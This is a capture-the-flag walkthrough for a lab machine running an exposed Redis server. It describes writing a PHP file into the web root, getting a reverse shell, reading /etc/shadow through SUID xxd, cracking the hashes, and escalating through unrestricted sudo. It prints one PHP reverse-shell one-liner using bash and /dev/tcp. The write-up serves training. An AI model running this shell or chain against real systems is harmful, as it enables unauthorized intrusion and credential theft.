Date: 27/03/2022
Difficulty: Easy
Hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge!
Scan the machine, how many ports are open?
What’s the database management system installed on the server? What port is the database management system running on?What’s is the version of management system installed on the server?
Compromise the machine and locate user.txt
First of all, let’s visit the webpage hosted on the port 80:
It displays a default page of an apache server recently installed.
As we have seen, there is a redis server running on port 6379. After some reading, I found that there is a way to interact with this service.
Let’s download the redis application:
Let’s test the connection:
It seems like we have connection with the redis server!
The info command seems to be helpful to retrieve redis server information:
According to this webpage ( there is a way to do a Remote Code Execution on a redis server:
We should know the path where we want to write the php file. Since we have visited the page before, we know that the folder is: /var/www/html
So, following the steps we do the same in our case:
Now let’s visit the page:
It works, now let’s try to write a reverse shell in php:
Let’s open a netcat listener in our machine:
And let’s visit the rs.php file:
We got a connection but it quickly disconnects…
Let’s try with this other one-line php reverse shell:
<?php exec("/bin/bash -c \'bash -i > /dev/tcp/ 0>&1\'"); ?>
Yeah, this one works!
We found the key file in the /home/vianka folder.
What is the local user account password?
Before anything, let’s try to stabilize this shell:
Python is installed in the machine, so let’s use it:
Ok, shell stabilized, now let’s look for the local user account password. Can we read /etc/shadow file?
Nope, we can’t.
Something interesting in the history?
Let’s see if we find some keys in the user directory… nothing useful I can see…
After spending some time looking for ssh keys or something useful, I look for files with SUID activated:
From this list, xxd appears in the GTFO Bins list:
Exploiting this, we should be able to read /etc/shadow file!
Yeah! Now with the info of /etc/passwd, let’s use unshadow and John the ripper to crack the hash!
Unshadow done, now let’s crack it!
Escalate privileges and obtain root.txt
Let’s login as vianka and see if we have more permissions:
Enough permissions to access to root folder?
Nope. Let’s see what we can execute with sudo:
Really? We can run any command using sudo…
And this quickly we get the last flag!